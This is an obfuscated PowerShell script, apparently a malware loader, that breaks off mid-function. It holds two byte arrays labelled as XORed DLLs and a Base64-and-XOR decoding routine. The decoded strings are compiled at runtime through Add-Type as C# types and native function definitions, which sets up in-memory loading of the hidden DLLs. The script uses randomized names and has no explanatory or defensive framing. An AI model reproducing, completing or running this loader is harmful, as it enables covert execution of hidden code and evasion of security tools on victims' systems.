[byte[]]$KdtMGBDf=@(0xe3,0xf4,0x3e,0xae,0xad,0xae,0xae,0xae,0xaa,0xae,0xae,0xae,0x51,0x51,0xae,...) # XORed DLL, Scriptblock 1-16
[byte[]]$JSavlCRkvJtfAgC=@(0x3c,0x2b,0xe1,0x71,0x72,0x71,0x71,0x71,0x75,0x71,0x71,0x71,0x8e,0x8e,...) # XORed DLL, Scriptblock 17-48
function XRHWxMEePcnJxrpvlimQ
{
param
(
[Parameter(Position = 0 , Mandatory = $true)] [string] $YvlsIRFwgnkMDzXYS,
[Parameter(Position = 1 , Mandatory = $true)] [byte] $PCLtzXNRvMcLnUgYii
)
$FHRBphVzK = [System.Convert]::FromBase64String( $YvlsIRFwgnkMDzXYS )
for ( $eXjjgpVWtoEQjAWA = 0; $eXjjgpVWtoEQjAWA -lt $FHRBphVzK.length; $eXjjgpVWtoEQjAWA++ )
{
$FHRBphVzK[$eXjjgpVWtoEQjAWA] = $FHRBphVzK[$eXjjgpVWtoEQjAWA] -bxor $PCLtzXNRvMcLnUgYii
}
return [System.Text.Encoding]::ASCII.GetString( $FHRBphVzK )
}
$CFLtdj = XRHWxMEePcnJxrpvlimQ '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' 0x08
$VlssLemZ = XRHWxMEePcnJxrpvlimQ '7fLa2v/bxtnEwp6U3dPE2NPahYSY0tralJrl08L618XC88TE2cSWi5bCxMPTmpbz2MLEz+bZ39jClouWlODfxMLD19r32trZ1ZSf67u8xsPU2t/VlsXC18Lf1ZbTzsLTxNiW/9jC5sLEltHb7uPM957/2MLmwsSW2OPBxuX85/X68OGa4//YwubCxJb+887u7NTlmuP/2MKFhJb11cz5muP/2MKFhJbC3sHmn427vLu87fLa2v/bxtnEwp6U3dPE2NPahYSY0tralJrl08L618XC88TE2cSWi5bCxMPTmvPYwsTP5tnf2MKWi5aU8dPC5sTZ1ffS0sTTxcWUn+u7vMbD1Nrf1ZbFwtfC39WW087C08TYlv/YwubCxJbc0fTe+sLunv/YwubCxJbkxPHh7+6axcLE39jRlvXi0/TB/fH61/7018DC2tnU9NWfjbu8u7zt8tra/9vG2cTCnpTd08TY09qFhJjS2tqUmuXTwvrXxcLzxMTZxJaLlsLEw9Oa89jCxM/m2d/YwpaLlpT62dfS+t/UxNfEz/eUn+u7vMbD1Nrf1ZbFwtfC39WW087C08TYlv/YwubCxJbU3uLQx9SexcLE39jRlvL47PXn8/Li45+Nu7y7vO3y2tr/28bZxMKelN3TxNjT2oWEmNLa2pSa5dPC+tfFwvPExNnElouWwsTD05rz2MLEz+bZ39jClouWlOHE38LT5sTZ1dPFxfvT29nEz5Sf67u8xsPU2t/VlsXC18Lf1ZbTzsLTxNiW1NnZ2pb95+Thnv/YwubCxJbT7+fu+/qa/9jC5sLEltHa89nz4fD/0pr/2MLmwsSW1dzZ8v/+xPya4//YwubCxJbd+MTk5drS8+eaxNPQluP/2MLmwsSW1NzbzNT18Ofm3v33z+Hj9/vin427vLu87fLa2v/bxtnEwp6U3dPE2NPahYSY0tralJrl08L618XC88TE2cSWi5bCxMPTmvPYwsTP5tnf2MKWi5aU4N/EwsPX2vDE09OUn+u7vMbD1Nrf1ZbFwtfC39WW087C08TYltTZ2dqW1+DD0eKe/9jC5sLElt/+5uPwxM6Wmpbj/9jC5sLElv300NnRlprj/9jChYSW5tjG+9jC8tnD/sTC3NfCzOX5xZ+Nu7y7vO3y2tr/28bZxMKelN3TxNjT2oWEmNLa2pSa5dPC+tfFwvPExNnElouWwsTD05rz2MLEz+bZ39jClouWlPHTwvXDxMTT2MLmxNnV08XFlJ/ru7zGw9Ta39WWxcLXwt/VltPOwtPE2Jb/2MLmwsSW7PDk2/Xm59/T7ODw4vTi//P+8tKen427vLu87fLa2v/bxtnEwp6U3dPE2NPahYSY0tralJrl08L618XC88TE2cSWi5bCxMPTmvPYwsTP5tnf2MKWi5aU9drZxdP+19jS2tOUn+u7vMbD1Nrf1ZbFwtfC39WW087C08TYltTZ2dqW8t71nv/YwubCxJby/dXx/PHhw//f9cfm/PPT4NnZ/5+Nu7y7vO3y2tr/28bZxMKelN3TxNjT2oWEmNLa2pSaluXTwvrXxcLzxMTZxIvCxMPTmvPYwsTP5tnf2MKWi5aU4N/EwsPX2vfa2tnV886Un+u7vMbD1Nrf1ZbFwtfC39WW087C08TYlv/YwubCxJbS8fzQ/tDcnv/YwubCxJbj0+Tf9PXympb/2MLmwsSW3eb95/fT3tzFwv6aluP/2MLmwsSW9/D9/NP41cTH55qW4//YwoWElvvS8Ozn8OTO7Nrd78Pv8sTQ/uzzmpbj/9jChYSW88b/2NH/n427vLu87fLa2v/bxtnEwp6U3dPE2NPahYSY0tralJqW5dPC+tfFwvPExNnEi8LEw9Oa89jCxM/m2d/YwpaLlpTg38TCw9fa5sTZwtPVwvPOlJ/ru7zGw9Ta39WWxcLXwt/VltPOwtPE2JbU2dnaltHexdXd3/76+ODPnpb/2MLmwsSWwszyzMLl1Pnd9efRw8Xl88Calv/YwubCxJbA/OPswc/0+/yaluP/2MLmwsSW2uTzxPvuxsLmxdfAw++aluP/2MKFhJbG+efuwN7U2tTb+8He1PXy/5qWxNPQluP/2MKFhJbUzPfQ3N/Q7vzz2sfM7/7an427vLu87fLa2v/bxtnEwp6U3dPE2NPahYSY0tralJqW5dPC+tfFwvPExNnElouWwsTD05rz2MLEz+bZ39jClouWlPnG09jmxNnV08XFlJ/ru7zGw9Ta39WWxcLXwt/VltPOwtPE2Jb/2MLmwsSW7/jB48T75N7Snpbj/9jChYSW5Nr69+XV+OWaltTZ2dqW1fve8PHa99jY3JqWluP/2MKFhJbXxufuz9H41cfQ8t3w0sP0lp+Nu7y7vO3y2tr/28bZxMKelN3TxNjT2oWEmNLa2pSa89jCxM/m2d/YwpaLlpT1xNPXwtPk09vZwtPi3sTT19KUn+u7vMbD1Nrf1ZbFwtfC39WW087C08TYlv/YwubCxJbP/d/y+dPO9ObX5sH8nv/YwubCxJbs1+z9wcTS597e7pqW/9jC5sLEluHPx+Pm8fvM/vH89/jS0Nju/JqW4//YwoWEluTgwfLRxv/hmpb/2MLmwsSW8vr7/JqW/9jC5sLElvXYxuPT4cbQ9OfA4/KaluP/2MKFhJbu59n/287A/e7bwPvj8cbc5sP+x5qW/9jC5sLElv/Y0c/A0J+N' 0xb6
$Vfej = XRHWxMEePcnJxrpvlimQ 'CxUSHQwV' 0x5c
$dxeRvWVxJVCMcBRT = XRHWxMEePcnJxrpvlimQ 'lYW+t6Sm' 0xd6
Add-Type -TypeDefinition $CFLtdj -Language $dxeRvWVxJVCMcBRT
$viZTKqyHmTGGPGyQov = Add-Type -MemberDefinition $VlssLemZ -Name 'viZTKqyHmTGGPGyQov' -Namespace $Vfej -PassThru
Function LSjevmBSTK
{
Param
(
